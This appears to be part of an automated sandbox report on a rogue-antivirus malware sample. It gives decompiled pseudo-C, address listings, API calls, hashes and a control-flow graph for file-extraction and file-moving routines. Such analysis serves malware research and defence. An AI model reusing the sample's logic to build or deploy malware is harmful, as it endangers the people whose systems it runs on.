                                                                                                                                                              													_t548 = _t548 - 1;
                                                                                                                                                              													__eflags = _t548;
                                                                                                                                                              												} while (_t548 != 0);
                                                                                                                                                              												goto L68;
                                                                                                                                                              											}
                                                                                                                                                              											L69:
                                                                                                                                                              											_v20 = _v20 + 1;
                                                                                                                                                              											_v12 = _v12 - 4;
                                                                                                                                                              											__eflags = _v12 - 0xfffffffc;
                                                                                                                                                              										} while (_v12 > 0xfffffffc);
                                                                                                                                                              										goto L70;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t514 = _t465 - 6;
                                                                                                                                                              								__eflags = _t514;
                                                                                                                                                              								if(_t514 == 0) {
                                                                                                                                                              									goto L33;
                                                                                                                                                              								} else {
                                                                                                                                                              									__eflags = _t514 == 1;
                                                                                                                                                              									if(_t514 == 1) {
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										_t568 = _t440 + 0x5398;
                                                                                                                                                              										__eflags =  *_t568 & 0x00000002;
                                                                                                                                                              										if(( *_t568 & 0x00000002) != 0) {
                                                                                                                                                              											E00408E05( &_v56, _t440 + 0x539c);
                                                                                                                                                              										}
                                                                                                                                                              										__eflags =  *_t568 & 0x00000008;
                                                                                                                                                              										if(( *_t568 & 0x00000008) != 0) {
                                                                                                                                                              											E00408DC6( &_v56, _t440 + 0x53a0);
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										__eflags =  *_t533 & 0x00008000;
                                                                                                                                                              										if(( *_t533 & 0x00008000) != 0) {
                                                                                                                                                              											E00408E05( &_v56,  &_v12);
                                                                                                                                                              											 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _v12;
                                                                                                                                                              											asm("adc dword [ebx+0x6d84], 0x0");
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L76;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *_t533 & 0x00000002;
                                                                                                                                                              							if(( *_t533 & 0x00000002) != 0) {
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              							goto L22;
                                                                                                                                                              						}
                                                                                                                                                              						L19:
                                                                                                                                                              						_push(6);
                                                                                                                                                              						goto L23;
                                                                                                                                                              					} else {
                                                                                                                                                              						E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                              						 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                              						E0040325C(0x414c7c, 3);
                                                                                                                                                              						goto L6;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t526 =  *(__ecx + 0x6d7c);
                                                                                                                                                              				_t429 =  *((intOrPtr*)(__ecx + 0x6d94)) + 0x14;
                                                                                                                                                              				asm("adc ecx, ecx");
                                                                                                                                                              				_t578 = _t526;
                                                                                                                                                              				if(_t578 < 0 || _t578 <= 0 &&  *((intOrPtr*)(__ecx + 0x6d78)) < _t429) {
                                                                                                                                                              					goto L10;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t554 = _t440 + 0xe60;
                                                                                                                                                              					_v5 = 1;
                                                                                                                                                              					if(E0040568A(_t440, _t526, _t440 + 0xe60, 8) == 8) {
                                                                                                                                                              						_t432 =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                              						__eflags =  *_t432;
                                                                                                                                                              						if( *_t432 == 0) {
                                                                                                                                                              							_t432 = E00402C96(2, _t440 + 0x17, _t432, 0x80);
                                                                                                                                                              							__eflags = _t432;
                                                                                                                                                              							if(_t432 == 0) {
                                                                                                                                                              								E00404F2E(_t440);
                                                                                                                                                              								_t432 = L0040343E(0x414c7c, _t570, 0xff);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *((char*)(_t440 + 0x46a0)) - 0x24;
                                                                                                                                                              						_t569 = _t440 + 0xc20;
                                                                                                                                                              						asm("sbb al, al");
                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                              						E00402DBD(_t569, _t526,  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418, _t554, 0, 0, _t432 + 0x00000001 & 0x000000ff);
                                                                                                                                                              						_v32 = _t569;
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              			}





















































































                                                                                                                                                              0x00401ce5
                                                                                                                                                              0x00401ced
                                                                                                                                                              0x00401cf5
                                                                                                                                                              0x00401cf7
                                                                                                                                                              0x00401d00
                                                                                                                                                              0x00401d06
                                                                                                                                                              0x00401d0c
                                                                                                                                                              0x00401d18
                                                                                                                                                              0x00401d72
                                                                                                                                                              0x00401d72
                                                                                                                                                              0x00401de3
                                                                                                                                                              0x00401de8
                                                                                                                                                              0x00401ded
                                                                                                                                                              0x00401df1
                                                                                                                                                              0x00401d56
                                                                                                                                                              0x00401d58
                                                                                                                                                              0x00401d5d
                                                                                                                                                              0x00401d5d
                                                                                                                                                              0x00401d61
                                                                                                                                                              0x00401d61
                                                                                                                                                              0x00401d66
                                                                                                                                                              0x00401d66
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401d6b
                                                                                                                                                              0x00401e01
                                                                                                                                                              0x00401e0d
                                                                                                                                                              0x00401e16
                                                                                                                                                              0x00401e20
                                                                                                                                                              0x00401e26
                                                                                                                                                              0x00401e2b
                                                                                                                                                              0x00401e35
                                                                                                                                                              0x00401e3a
                                                                                                                                                              0x00401e3d
                                                                                                                                                              0x00401e41
                                                                                                                                                              0x00401e74
                                                                                                                                                              0x00401e7a
                                                                                                                                                              0x00401e7d
                                                                                                                                                              0x00401e83
                                                                                                                                                              0x00401e86
                                                                                                                                                              0x00401e8d
                                                                                                                                                              0x00401e90
                                                                                                                                                              0x00401e90
                                                                                                                                                              0x00401e93
                                                                                                                                                              0x00401e94
                                                                                                                                                              0x00401e97
                                                                                                                                                              0x00401e9f
                                                                                                                                                              0x00401ea6
                                                                                                                                                              0x00401eac
                                                                                                                                                              0x00401eb2
                                                                                                                                                              0x00401eba
                                                                                                                                                              0x00401eba
                                                                                                                                                              0x00401ebd
                                                                                                                                                              0x00401ec3
                                                                                                                                                              0x004023ad
                                                                                                                                                              0x004023ae
                                                                                                                                                              0x004023b9
                                                                                                                                                              0x004023ba
                                                                                                                                                              0x004023c9
                                                                                                                                                              0x004023d3
                                                                                                                                                              0x004023da
                                                                                                                                                              0x004023e6
                                                                                                                                                              0x004023e6
                                                                                                                                                              0x004023eb
                                                                                                                                                              0x004023f1
                                                                                                                                                              0x004023f6
                                                                                                                                                              0x004023fa
                                                                                                                                                              0x00402400
                                                                                                                                                              0x00402402
                                                                                                                                                              0x00402409
                                                                                                                                                              0x0040240f
                                                                                                                                                              0x004024c1
                                                                                                                                                              0x004024c7
                                                                                                                                                              0x004024cd
                                                                                                                                                              0x004024fa
                                                                                                                                                              0x004024fa
                                                                                                                                                              0x004024fd
                                                                                                                                                              0x00402500
                                                                                                                                                              0x00402505
                                                                                                                                                              0x00402505
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040250a
                                                                                                                                                              0x004024cf
                                                                                                                                                              0x004024df
                                                                                                                                                              0x004024f0
                                                                                                                                                              0x004024a6
                                                                                                                                                              0x004024ad
                                                                                                                                                              0x004024b4
                                                                                                                                                              0x004024b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004024b9
                                                                                                                                                              0x004024d7
                                                                                                                                                              0x004024dd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004024dd
                                                                                                                                                              0x0040241b
                                                                                                                                                              0x0040241e
                                                                                                                                                              0x00402424
                                                                                                                                                              0x0040242a
                                                                                                                                                              0x00402431
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402437
                                                                                                                                                              0x0040243a
                                                                                                                                                              0x0040248a
                                                                                                                                                              0x00402497
                                                                                                                                                              0x004024a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004024a1
                                                                                                                                                              0x0040243c
                                                                                                                                                              0x00402443
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402449
                                                                                                                                                              0x00402450
                                                                                                                                                              0x00402455
                                                                                                                                                              0x00402458
                                                                                                                                                              0x00402459
                                                                                                                                                              0x00402459
                                                                                                                                                              0x0040245b
                                                                                                                                                              0x0040245d
                                                                                                                                                              0x0040245e
                                                                                                                                                              0x00402461
                                                                                                                                                              0x00402466
                                                                                                                                                              0x0040246a
                                                                                                                                                              0x0040246c
                                                                                                                                                              0x00402471
                                                                                                                                                              0x00402473
                                                                                                                                                              0x00402475
                                                                                                                                                              0x00402475
                                                                                                                                                              0x00402479
                                                                                                                                                              0x00402479
                                                                                                                                                              0x00402479
                                                                                                                                                              0x0040247f
                                                                                                                                                              0x00402484
                                                                                                                                                              0x00402488
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402488
                                                                                                                                                              0x00401ec9
                                                                                                                                                              0x00401ec9
                                                                                                                                                              0x00401eca
                                                                                                                                                              0x00401f49
                                                                                                                                                              0x00401f49
                                                                                                                                                              0x00401f4c
                                                                                                                                                              0x00401f52
                                                                                                                                                              0x00401f54
                                                                                                                                                              0x00401f54
                                                                                                                                                              0x00401f62
                                                                                                                                                              0x00401f63
                                                                                                                                                              0x00401f64
                                                                                                                                                              0x00401f6e
                                                                                                                                                              0x00401f6f
                                                                                                                                                              0x00401f72
                                                                                                                                                              0x00401f77
                                                                                                                                                              0x00401f7a
                                                                                                                                                              0x00401f81
                                                                                                                                                              0x00401f84
                                                                                                                                                              0x00401f89
                                                                                                                                                              0x00401f90
                                                                                                                                                              0x00401f95
                                                                                                                                                              0x00401f9c
                                                                                                                                                              0x00401fa1
                                                                                                                                                              0x00401fa8
                                                                                                                                                              0x00401fab
                                                                                                                                                              0x00401fb0
                                                                                                                                                              0x00401fb7
                                                                                                                                                              0x00401fbc
                                                                                                                                                              0x00401fc3
                                                                                                                                                              0x00401fc8
                                                                                                                                                              0x00401fcf
                                                                                                                                                              0x00401fd2
                                                                                                                                                              0x00401fd7
                                                                                                                                                              0x00401fde
                                                                                                                                                              0x00401fe8
                                                                                                                                                              0x00401fe8
                                                                                                                                                              0x00401feb
                                                                                                                                                              0x00401fef
                                                                                                                                                              0x0040200b
                                                                                                                                                              0x0040200e
                                                                                                                                                              0x00402011
                                                                                                                                                              0x00402011
                                                                                                                                                              0x00402014
                                                                                                                                                              0x00402017
                                                                                                                                                              0x0040201a
                                                                                                                                                              0x0040201d
                                                                                                                                                              0x0040201f
                                                                                                                                                              0x00402024
                                                                                                                                                              0x00402026
                                                                                                                                                              0x00402026
                                                                                                                                                              0x00401ff1
                                                                                                                                                              0x00401ff5
                                                                                                                                                              0x00401ffa
                                                                                                                                                              0x00402001
                                                                                                                                                              0x00402004
                                                                                                                                                              0x00402004
                                                                                                                                                              0x00402041
                                                                                                                                                              0x0040204d
                                                                                                                                                              0x0040204f
                                                                                                                                                              0x00402061
                                                                                                                                                              0x0040206a
                                                                                                                                                              0x0040206d
                                                                                                                                                              0x0040206f
                                                                                                                                                              0x00402076
                                                                                                                                                              0x0040207c
                                                                                                                                                              0x0040207f
                                                                                                                                                              0x00402081
                                                                                                                                                              0x00402081
                                                                                                                                                              0x0040208f
                                                                                                                                                              0x0040209f
                                                                                                                                                              0x004020a4
                                                                                                                                                              0x004020ac
                                                                                                                                                              0x004020af
                                                                                                                                                              0x004020b4
                                                                                                                                                              0x004020b7
                                                                                                                                                              0x004020ba
                                                                                                                                                              0x00402147
                                                                                                                                                              0x0040214a
                                                                                                                                                              0x00402155
                                                                                                                                                              0x00402159
                                                                                                                                                              0x004021e2
                                                                                                                                                              0x004021e4
                                                                                                                                                              0x0040215f
                                                                                                                                                              0x00402162
                                                                                                                                                              0x0040216e
                                                                                                                                                              0x00402176
                                                                                                                                                              0x00402179
                                                                                                                                                              0x00402179
                                                                                                                                                              0x0040217f
                                                                                                                                                              0x00402181
                                                                                                                                                              0x004021b6
                                                                                                                                                              0x004021cc
                                                                                                                                                              0x00402183
                                                                                                                                                              0x00402190
                                                                                                                                                              0x0040219e
                                                                                                                                                              0x004021a9
                                                                                                                                                              0x004021a9
                                                                                                                                                              0x004021d1
                                                                                                                                                              0x004021d5
                                                                                                                                                              0x004021dc
                                                                                                                                                              0x004021dc
                                                                                                                                                              0x004021d5
                                                                                                                                                              0x004021ed
                                                                                                                                                              0x004021ed
                                                                                                                                                              0x004020c0
                                                                                                                                                              0x004020d1
                                                                                                                                                              0x004020d4
                                                                                                                                                              0x004020d8
                                                                                                                                                              0x004020da
                                                                                                                                                              0x004020da
                                                                                                                                                              0x004020da
                                                                                                                                                              0x004020dd
                                                                                                                                                              0x004020df
                                                                                                                                                              0x004020e5
                                                                                                                                                              0x004020ec
                                                                                                                                                              0x004020fb
                                                                                                                                                              0x00402108
                                                                                                                                                              0x0040210d
                                                                                                                                                              0x0040210f
                                                                                                                                                              0x0040213c
                                                                                                                                                              0x0040213c
                                                                                                                                                              0x0040210f
                                                                                                                                                              0x004020df
                                                                                                                                                              0x004021f7
                                                                                                                                                              0x004021fb
                                                                                                                                                              0x004021ff
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00402213
                                                                                                                                                              0x00402219
                                                                                                                                                              0x00402225
                                                                                                                                                              0x0040222b
                                                                                                                                                              0x00402231
                                                                                                                                                              0x00402237
                                                                                                                                                              0x0040223b
                                                                                                                                                              0x00402319
                                                                                                                                                              0x0040231f
                                                                                                                                                              0x0040232e
                                                                                                                                                              0x0040233c
                                                                                                                                                              0x00402347
                                                                                                                                                              0x00402349
                                                                                                                                                              0x00402350
                                                                                                                                                              0x00402353
                                                                                                                                                              0x00402359
                                                                                                                                                              0x0040235c
                                                                                                                                                              0x00402360
                                                                                                                                                              0x0040236a
                                                                                                                                                              0x0040236a
                                                                                                                                                              0x00402376
                                                                                                                                                              0x0040237d
                                                                                                                                                              0x00402385
                                                                                                                                                              0x00402397
                                                                                                                                                              0x0040239c
                                                                                                                                                              0x0040239c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402241
                                                                                                                                                              0x00402248
                                                                                                                                                              0x00402253
                                                                                                                                                              0x0040225c
                                                                                                                                                              0x00402265
                                                                                                                                                              0x0040226e
                                                                                                                                                              0x00402271
                                                                                                                                                              0x00402274
                                                                                                                                                              0x0040227b
                                                                                                                                                              0x0040227e
                                                                                                                                                              0x00402289
                                                                                                                                                              0x0040228b
                                                                                                                                                              0x0040228e
                                                                                                                                                              0x00402290
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402292
                                                                                                                                                              0x00402296
                                                                                                                                                              0x0040229f
                                                                                                                                                              0x004022a9
                                                                                                                                                              0x004022ae
                                                                                                                                                              0x004022ba
                                                                                                                                                              0x004022be
                                                                                                                                                              0x004022be
                                                                                                                                                              0x004022c0
                                                                                                                                                              0x004022c2
                                                                                                                                                              0x004022c4
                                                                                                                                                              0x004022c4
                                                                                                                                                              0x004022c4
                                                                                                                                                              0x004022c4
                                                                                                                                                              0x004022c7
                                                                                                                                                              0x004022cd
                                                                                                                                                              0x004022ce
                                                                                                                                                              0x004022ce
                                                                                                                                                              0x004022d0
                                                                                                                                                              0x004022f6
                                                                                                                                                              0x004022ff
                                                                                                                                                              0x00402303
                                                                                                                                                              0x00402303
                                                                                                                                                              0x00402305
                                                                                                                                                              0x004022d2
                                                                                                                                                              0x004022d4
                                                                                                                                                              0x004022d4
                                                                                                                                                              0x004022d7
                                                                                                                                                              0x004022d9
                                                                                                                                                              0x004022e0
                                                                                                                                                              0x004022eb
                                                                                                                                                              0x004022ed
                                                                                                                                                              0x004022f0
                                                                                                                                                              0x004022f3
                                                                                                                                                              0x004022f3
                                                                                                                                                              0x004022f3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004022d9
                                                                                                                                                              0x00402308
                                                                                                                                                              0x00402308
                                                                                                                                                              0x0040230b
                                                                                                                                                              0x0040230f
                                                                                                                                                              0x0040230f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040227b
                                                                                                                                                              0x0040223b
                                                                                                                                                              0x00401ecc
                                                                                                                                                              0x00401ecc
                                                                                                                                                              0x00401ecf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401ed1
                                                                                                                                                              0x00401ed1
                                                                                                                                                              0x00401ed2
                                                                                                                                                              0x00401f0f
                                                                                                                                                              0x00401f10
                                                                                                                                                              0x00401f11
                                                                                                                                                              0x00401f12
                                                                                                                                                              0x00401f18
                                                                                                                                                              0x00401f1b
                                                                                                                                                              0x00401f27
                                                                                                                                                              0x00401f27
                                                                                                                                                              0x00401f2c
                                                                                                                                                              0x00401f2f
                                                                                                                                                              0x00401f3f
                                                                                                                                                              0x00401f3f
                                                                                                                                                              0x00401ed4
                                                                                                                                                              0x00401ed9
                                                                                                                                                              0x00401edc
                                                                                                                                                              0x00401ee9
                                                                                                                                                              0x00401ef1
                                                                                                                                                              0x00401ef7
                                                                                                                                                              0x00401ef7
                                                                                                                                                              0x00401edc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401ed2
                                                                                                                                                              0x00401ecf
                                                                                                                                                              0x00401e88
                                                                                                                                                              0x00401e8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401e8b
                                                                                                                                                              0x00401e7f
                                                                                                                                                              0x00401e7f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401e43
                                                                                                                                                              0x00401e54
                                                                                                                                                              0x00401e63
                                                                                                                                                              0x00401e6a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401e6a
                                                                                                                                                              0x00401e41
                                                                                                                                                              0x00401d20
                                                                                                                                                              0x00401d28
                                                                                                                                                              0x00401d2b
                                                                                                                                                              0x00401d2d
                                                                                                                                                              0x00401d2f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401d3d
                                                                                                                                                              0x00401d3f
                                                                                                                                                              0x00401d48
                                                                                                                                                              0x00401d54
                                                                                                                                                              0x00401d7e
                                                                                                                                                              0x00401d83
                                                                                                                                                              0x00401d86
                                                                                                                                                              0x00401d94
                                                                                                                                                              0x00401d99
                                                                                                                                                              0x00401d9b
                                                                                                                                                              0x00401d9f
                                                                                                                                                              0x00401dae
                                                                                                                                                              0x00401dae
                                                                                                                                                              0x00401d9b
                                                                                                                                                              0x00401db3
                                                                                                                                                              0x00401dba
                                                                                                                                                              0x00401dc0
                                                                                                                                                              0x00401dd3
                                                                                                                                                              0x00401ddb
                                                                                                                                                              0x00401de0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401de0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401d54

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                                • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                                • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                              • CharToOemA.USER32 ref: 004021A9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$ByteErrorFileLastMultiPointerWide
                                                                                                                                                              • String ID: - ???$???$|LA$|LA$|LA$|LA
                                                                                                                                                              • API String ID: 1784729808-3627379113
                                                                                                                                                              • Opcode ID: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                              • Instruction ID: d3ae9a043b2c9d79d016dc6309aa3c7e2dade4953754a766d4f739c7a40d4fc9
                                                                                                                                                              • Opcode Fuzzy Hash: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                              • Instruction Fuzzy Hash: 9132E1719002049BDF11DFA5C985AEE77BABF40304F14057FE946BB2D2EB786A44CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1222 40c78e-40c792 1223 40c798-40c7a8 call 40a250 1222->1223 1224 40ca2a-40ca52 call 40b613 1222->1224 1231 40c7aa-40c7ad 1223->1231 1232 40c7cd 1223->1232 1229 40bfe1-40c001 1224->1229 1230 40ca58-40ca5c 1224->1230 1233 40c008-40c01b call 40a925 1229->1233 1235 40c7c4-40c7cb 1231->1235 1236 40c7af-40c7b0 1231->1236 1237 40c7d4-40c7fc call 40a477 1232->1237 1245 40c01d 1233->1245 1235->1237 1240 40c7b2-40c7b9 1236->1240 1241 40c7bb-40c7c2 1236->1241 1246 40c83d-40c84d call 405767 1237->1246 1247 40c7fe-40c821 call 40a477 call 4073ab 1237->1247 1240->1237 1241->1237 1248 40c021-40c03a lstrcmpiA 1245->1248 1257 40c8c0-40c8c7 1246->1257 1258 40c84f-40c85e 1246->1258 1247->1257 1268 40c827-40c838 call 40a477 1247->1268 1251 40c04a-40c04e 1248->1251 1252 40c03c-40c043 1248->1252 1251->1224 1259 40c054-40c057 1251->1259 1252->1248 1256 40c045 1252->1256 1256->1224 1262 40c8c9-40c8d7 call 405822 1257->1262 1263 40c8dc-40c911 call 405822 call 40aac2 call 4076c8 1257->1263 1258->1257 1261 40c860-40c865 1258->1261 1264 40c313-40c317 1259->1264 1265 40c2f4-40c2f8 1259->1265 1266 40c266-40c26a 1259->1266 1267 40c05e-40c062 1259->1267 1270 40c867-40c86a 1261->1270 1271 40c86c-40c87f call 405767 1261->1271 1262->1263 1321 40c932-40c952 call 40a477 1263->1321 1322 40c913-40c92d call 40a5e2 call 4076c8 1263->1322 1264->1224 1276 40c31d-40c324 1264->1276 1265->1224 1274 40c2fe-40c30e SetWindowTextA 1265->1274 1266->1224 1269 40c270-40c27c 1266->1269 1267->1224 1273 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 1267->1273 1268->1257 1278 40c289-40c28d 1269->1278 1279 40c27e-40c284 call 40a5e2 1269->1279 1270->1271 1280 40c8b3-40c8b7 1270->1280 1300 40c8b1 1271->1300 1301 40c881-40c886 1271->1301 1386 40c0f0 1273->1386 1387 40c256-40c261 call 405bca 1273->1387 1274->1224 1276->1224 1284 40c32a-40c33e 1276->1284 1289 40c297-40c29f call 40b7ba 1278->1289 1290 40c28f-40c295 1278->1290 1279->1278 1280->1261 1291 40c8b9-40c8bb 1280->1291 1285 40c340 1284->1285 1286 40c346-40c351 call 40a384 1284->1286 1285->1286 1286->1224 1315 40c357-40c35b 1286->1315 1297 40c2a1-40c2a3 1289->1297 1290->1297 1291->1257 1299 40c8bd 1291->1299 1306 40c2a5-40c2a7 1297->1306 1307 40c2a9-40c2b4 call 40a384 1297->1307 1299->1257 1300->1280 1308 40c888-40c898 1301->1308 1309 40c89a-40c89e 1301->1309 1316 40c2b6-40c2d3 call 40a384 call 40a224 1306->1316 1307->1316 1311 40c8a7-40c8af call 40a477 1308->1311 1309->1309 1313 40c8a0-40c8a1 1309->1313 1311->1280 1313->1311 1323 40c361-40c365 1315->1323 1324 40c408-40c40a 1315->1324 1349 40c2d5 1316->1349 1350 40c2d8-40c2e3 call 40a5e2 1316->1350 1347 40c954 1321->1347 1348 40c95a-40c97b call 4073db call 40a5e2 call 407690 1321->1348 1322->1321 1323->1324 1330 40c36b 1323->1330 1331 40c410-40c412 1324->1331 1332 40c36e-40c376 call 40a477 1324->1332 1330->1332 1337 40c414-40c418 1331->1337 1338 40c41e-40c438 RegOpenKeyExA 1331->1338 1344 40c37b-40c38b call 40a3d9 1332->1344 1337->1332 1337->1338 1345 40c469-40c470 1338->1345 1346 40c43a-40c463 RegQueryValueExA RegCloseKey 1338->1346 1365 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 1344->1365 1366 40c38d-40c391 1344->1366 1353 40c472-40c489 call 40a384 1345->1353 1354 40c49c-40c4b8 call 40a384 * 2 1345->1354 1346->1345 1347->1348 1389 40c98c-40c998 call 40a5e2 1348->1389 1390 40c97d-40c98a call 40a59a 1348->1390 1349->1350 1350->1224 1370 40c2e9-40c2ef call 40a205 1350->1370 1353->1354 1374 40c48b-40c497 call 40a5e2 1353->1374 1354->1344 1384 40c4be-40c4cb call 40a5e2 1354->1384 1403 40c3e6-40c3e8 1365->1403 1366->1365 1372 40c393 1366->1372 1370->1224 1372->1365 1374->1354 1384->1224 1384->1344 1392 40c0f5-40c10b SetFileAttributesA 1386->1392 1387->1224 1405 40c99d-40ca03 call 4058ff call 40a9bd 1389->1405 1390->1389 1390->1405 1399 40c111-40c119 call 406ea5 1392->1399 1400 40c1bb-40c1c7 GetFileAttributesA 1392->1400 1399->1400 1415 40c11f-40c150 call 407300 call 4076c8 call 40a384 1399->1415 1401 40c1c9-40c1d8 DeleteFileA 1400->1401 1402 40c23a-40c250 call 405fad 1400->1402 1401->1402 1407 40c1da-40c1de 1401->1407 1402->1387 1402->1392 1403->1224 1408 40c3ee-40c403 SendMessageA 1403->1408 1405->1224 1425 40ca05-40ca1b SHChangeNotify 1405->1425 1412 40c1e6-40c206 wsprintfA GetFileAttributesA 1407->1412 1408->1224 1417 40c1e0-40c1e3 1412->1417 1418 40c208-40c21e MoveFileA 1412->1418 1431 40c152-40c161 call 40a384 1415->1431 1432 40c163-40c173 call 407279 1415->1432 1417->1412 1418->1402 1421 40c220-40c227 call 406ea5 1418->1421 1421->1402 1429 40c229-40c234 MoveFileExA 1421->1429 1425->1224 1429->1402 1431->1432 1437 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 1431->1437 1432->1387 1432->1437 1437->1400
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E0040C78E(void* __ecx, void* __esi) {
                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                              				void* _t232;
                                                                                                                                                              				void* _t307;
                                                                                                                                                              				void* _t309;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					_t307 = __esi;
                                                                                                                                                              					if( *((intOrPtr*)(_t309 + 0x10)) != 6) {
                                                                                                                                                              						goto L152;
                                                                                                                                                              					}
                                                                                                                                                              					L115:
                                                                                                                                                              					__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                              					__eax = E0040A250(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                              					__eax = __eax - 0x50;
                                                                                                                                                              					__eflags = __eax;
                                                                                                                                                              					if(__eax == 0) {
                                                                                                                                                              						 *(__ebp - 4) = 2;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eax = __eax - 3;
                                                                                                                                                              						__eflags = __eax;
                                                                                                                                                              						if(__eax == 0) {
                                                                                                                                                              							 *(__ebp - 4) = 0xb;
                                                                                                                                                              						} else {
                                                                                                                                                              							__eax = __eax - 1;
                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                              							if(__eax == 0) {
                                                                                                                                                              								 *(__ebp - 4) = 7;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 4) = 0x10;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                              					 *(__ebp - 0x2034) = 0;
                                                                                                                                                              					 *(__ebp - 0x834) = 0;
                                                                                                                                                              					__eax = E0040A477(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                              					__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						L125:
                                                                                                                                                              						__ebp - 0xc34 = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                              						__eflags = __al;
                                                                                                                                                              						if(__al != 0) {
                                                                                                                                                              							goto L139;
                                                                                                                                                              						}
                                                                                                                                                              						L126:
                                                                                                                                                              						__edi = 0;
                                                                                                                                                              						__eflags =  *(__ebp - 0xc34);
                                                                                                                                                              						__esi = __ebp - 0xc34;
                                                                                                                                                              						if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                              							goto L139;
